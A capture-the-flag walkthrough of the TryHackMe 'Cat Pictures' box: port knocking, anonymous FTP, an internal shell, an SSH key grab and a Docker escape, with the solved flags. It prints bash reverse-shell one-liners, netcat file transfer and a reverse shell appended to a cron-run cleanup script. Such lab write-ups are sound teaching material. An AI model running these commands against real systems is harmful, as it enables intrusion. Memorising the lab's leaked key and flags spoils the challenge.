Cat Pictures (phpBB, Knockd, Docker)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  nmap -A 10.10.68.82 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 21:28 +0630
Nmap scan report for 10.10.68.82
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT     STATE    SERVICE    VERSION
22/tcp   open     ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:43:64:80:d3:5a:74:62:81:b7:80:6b:1a:23:d8:4a (RSA)
|   256 53:c6:82:ef:d2:77:33:ef:c1:3d:9c:15:13:54:0e:b2 (ECDSA)
|_  256 ba:97:c3:23:d4:f2:cc:08:2c:e1:2b:30:06:18:95:41 (ED25519)
8080/tcp filtered http-proxy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.12 seconds

Port 8080

You can see some interesting things in php forum.

It can be port knocking. We will knock 1111 2222 3333 4444 sequences and scan again using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  knock 10.10.68.82 1111 2222 3333 4444
╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  nmap 10.10.68.82                     
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-26 21:54 +0630
Nmap scan report for 10.10.68.82
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 36.74 seconds

Port 21

Connect ftp using anonymous login.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  ftp 10.10.68.82
Connected to 10.10.68.82.
220 (vsFTPd 3.0.3)
Name (10.10.68.82:hnl): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (162 bytes).
226 Transfer complete.
162 bytes received in 0.02 secs (8.4402 kB/s)
ftp>

Read the files.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  cat note.txt 
In case I forget my password, I'm leaving a pointer to the internal shell service on the server.

Connect to port 4420, the password is sardinethecat.
- catlover

Port 4420

Connect port 4420 using sardinethecat password.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  nc 10.10.68.82 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted
ls -al
total 56
drwxr-xr-x 10 1001 1001 4096 Apr  3  2021 .
drwxr-xr-x 10 1001 1001 4096 Apr  3  2021 ..
-rw-------  1 1001 1001   50 Apr  1  2021 .bash_history
-rw-r--r--  1 1001 1001  220 Apr  1  2021 .bash_logout
-rw-r--r--  1 1001 1001 3771 Apr  1  2021 .bashrc
-rw-r--r--  1 1001 1001  807 Apr  1  2021 .profile
drwxrwxr-x  2 1001 1001 4096 Apr  2  2021 bin
drwxr-xr-x  2    0    0 4096 Apr  1  2021 etc
drwxr-xr-x  3    0    0 4096 Apr  2  2021 home
drwxr-xr-x  3    0    0 4096 Apr  2  2021 lib
drwxr-xr-x  2    0    0 4096 Apr  1  2021 lib64
drwxr-xr-x  2    0    0 4096 Apr  2  2021 opt
drwxr-xr-x  2    0    0 4096 Apr  3  2021 tmp
drwxr-xr-x  4    0    0 4096 Apr  2  2021 usr
cat .bash_history
mkdir bin
exit
cp /bin/bash bin/
ls -alt bin
exit

You can run any command on this box. For stable shell, we can use bash reverse shell.

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9001 0>&1'

In /home/catlover, we can see a file called runme. Transfer it to local.

# Local
nc -l 9899 > runme

# Remote
nc -w 3 10.9.0.82 9899 < runme

With string analysis, the correct password is rebecca. We will run it runme file using this password.

I have no name!@cat-pictures:/home/catlover# ./runme
./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued! 
I have no name!@cat-pictures:/home/catlover# ls -al /tmp
ls -al /tmp
total 8
drwxr-xr-x  2    0    0 4096 Apr 26 15:58 .
drwxr-xr-x 10 1001 1001 4096 Apr  3  2021 ..
-rw-r--r--  1    0    0    0 Apr 26 15:58 gibmethesshkey

Read gibmethesshkey file in tmp. No content. But list the current directory, we can see private ssh key.

I have no name!@cat-pictures:/home/catlover# ls -al
ls -al
total 32
drwxr-xr-x 2 0 0  4096 Apr 26 15:59 .
drwxr-xr-x 3 0 0  4096 Apr  2  2021 ..
-rw-r--r-- 1 0 0  1675 Apr 26 15:59 id_rsa
-rwxr-xr-x 1 0 0 18856 Apr  3  2021 runme

Read the key file.

I have no name!@cat-pictures:/home/catlover# cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAmI1dCzfMF4y+TG3QcyaN3B7pLVMzPqQ1fSQ2J9jKzYxWArW5
IWnCNvY8gOZdOSWgDODCj8mOssL7SIIgkOuD1OzM0cMBSCCwYlaN9F8zmz6UJX+k
jSmQqh7eqtXuAvOkadRoFlyog2kZ1Gb72zebR75UCBzCKv1zODRx2zLgFyGu0k2u
xCa4zmBdm80X0gKbk5MTgM4/l8U3DFZgSg45v+2uM3aoqbhSNu/nXRNFyR/Wb10H
tzeTEJeqIrjbAwcOZzPhISo6fuUVNH0pLQOf/9B1ojI3/jhJ+zE6MB0m77iE07cr
lT5PuxlcjbItlEF9tjqudycnFRlGAKG6uU8/8wIDAQABAoIBAH1NyDo5p6tEUN8o
aErdRTKkNTWknHf8m27h+pW6TcKOXeu15o3ad8t7cHEUR0h0bkWFrGo8zbhpzcte
D2/Z85xGsWouufPL3fW4ULuEIziGK1utv7SvioMh/hXmyKymActny+NqUoQ2JSBB
QuhqgWJppE5RiO+U5ToqYccBv+1e2bO9P+agWe+3hpjWtiAUHEdorlJK9D+zpw8s
/+9CjpDzjXA45X2ikZ1AhWNLhPBnH3CpIgug8WIxY9fMbmU8BInA8M4LUvQq5A63
zvWWtuh5bTkj622QQc0Eq1bJ0bfUkQRD33sqRVUUBE9r+YvKxHAOrhkZHsvwWhK/
oylx3WECgYEAyFR+lUqnQs9BwrpS/A0SjbTToOPiCICzdjW9XPOxKy/+8Pvn7gLv
00j5NVv6c0zmHJRCG+wELOVSfRYv7z88V+mJ302Bhf6uuPd9Xu96d8Kr3+iMGoqp
tK7/3m4FjoiNCpZbQw9VHcZvkq1ET6qdzU+1I894YLVu258KeCVUqIMCgYEAwvHy
QTo6VdMOdoINzdcCCcrFCDcswYXxQ5SpI4qMpHniizoa3oQRHO5miPlAKNytw5PQ
zSKoIW47AObP2twzVAH7d+PWRzqAGZXW8gsF6Ls48LxSJGzz8V191PjbcGQO7Oro
Em8pQ+qCISxv3A8fKvG5E9xOspD0/3lsM/zGD9ECgYBOTgDAuFKS4dKRnCUt0qpK
68DBJfJHYo9DiJQBTlwVRoh/h+fLeChoTSDkQ5StFwTnbOg+Y83qAqVwsYiBGxWq
Q2YZ/ADB8KA5OrwtrKwRPe3S8uI4ybS2JKVtO1I+uY9v8P+xQcACiHs6OTH3dfiC
tUJXwhQKsUCo5gzAk874owKBgC/xvTjZjztIWwg+WBLFzFSIMAkjOLinrnyGdUqu
aoSRDWxcb/tF08efwkvxsRvbmki9c97fpSYDrDM+kOQsv9rrWeNUf4CpHJQuS9zf
ZSal1Q0v46vdt+kmqynTwnRTx2/xHf5apHV1mWd7PE+M0IeJR5Fg32H/UKH8ROZM
RpHhAoGAehljGmhge+i0EPtcok8zJe+qpcV2SkLRi7kJZ2LaR97QAmCCsH5SndzR
tDjVbkh5BX0cYtxDnfAF3ErDU15jP8+27pEO5xQNYExxf1y7kxB6Mh9JYJlq0aDt
O4fvFElowV6MXVEMY/04fdnSWavh0D+IkyGRcY5myFHyhWvmFcQ=
-----END RSA PRIVATE KEY-----

Connect ssh using this private key.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/catpictures  
╰─➤  ssh -i id_rsa catlover@10.10.68.82
The authenticity of host '10.10.68.82 (10.10.68.82)' can't be established.
ECDSA key fingerprint is SHA256:7HBac/JH7EKQik9kL1l9GMjCgLN/69gfXalu5cbPi4U.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.68.82' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Apr 26 09:06:23 PDT 2022

  System load:  0.21               Users logged in:                0
  Usage of /:   37.2% of 19.56GB   IP address for eth0:            10.10.68.82
  Memory usage: 60%                IP address for br-98674f8f20f9: 172.18.0.1
  Swap usage:   0%                 IP address for docker0:         172.17.0.1
  Processes:    100


52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Jun  4 14:40:35 2021
root@7546fa2336d6:/#

User && Root

Read the flag.

root@7546fa2336d6:/# cat /root/flag.txt
7cf90a0e7c5d25f1a827d3efe6fe4d0edd63cca9

We are in docker container. Here is .bash_history in /.

root@7546fa2336d6:/# cat .bash_history
exit
exit
exit
exit
exit
exit
exit
ip a
ifconfig
apt install ifconfig
ip
exit
nano /opt/clean/clean.sh 
ping 192.168.4.20
apt install ping
apt update
apt install ping
apt install iptuils-ping
apt install iputils-ping
exit
ls
cat /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
clear
cat /etc/crontab
ls -alt /
cat /post-init.sh 
cat /opt/clean/clean.sh 
bash -i >&/dev/tcp/192.168.4.20/4444 <&1
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
cat /var/log/dpkg.log 
nano /opt/clean/clean.sh 
nano /opt/clean/clean.sh 
exit
exit
exit

Check the file system.

root@7546fa2336d6:/# df -hT
Filesystem     Type     Size  Used Avail Use% Mounted on
overlay        overlay   20G  7.3G   12G  40% /
tmpfs          tmpfs     64M     0   64M   0% /dev
tmpfs          tmpfs    240M     0  240M   0% /sys/fs/cgroup
shm            tmpfs     64M     0   64M   0% /dev/shm
/dev/xvda1     ext4      20G  7.3G   12G  40% /opt/clean
tmpfs          tmpfs    240M     0  240M   0% /proc/acpi
tmpfs          tmpfs    240M     0  240M   0% /proc/scsi
tmpfs          tmpfs    240M     0  240M   0% /sys/firmware

Hum /opt/clean? What is that?

root@7546fa2336d6:/# cd /opt/clean 
root@7546fa2336d6:/opt/clean# ls -al
total 16
drwxr-xr-x 2 root root 4096 May  1  2021 .
drwxrwxr-x 1 root root 4096 Mar 25  2021 ..
-rw-r--r-- 1 root root   27 May  1  2021 clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh 
#!/bin/bash

rm -rf /tmp/*

Abuse it.

root@7546fa2336d6:/opt/clean# echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9002 0>&1'" >> /opt/clean/clean.sh
root@7546fa2336d6:/opt/clean# cat clean.sh 
#!/bin/bash

rm -rf /tmp/*
/bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.0.82/9002 0>&1'

In netcat session, we got reverse shell.

Read the flag.

root@cat-pictures:~# cat /root/root.txt
cat /root/root.txt
Congrats!!!
Here is your flag:

4a98e43d78bab283938a06f38d2ca3a3c53f0476

PreviousLockdown (SQLI, FileUpload, Cracking, Yara)NextMagician (ImageTragick, Port Forwarding)

Last updated 3 years ago

hashtagPort 8080

hashtagPort 21

hashtagPort 4420

hashtagUser && Root

Port 8080

Port 21

Port 4420

User && Root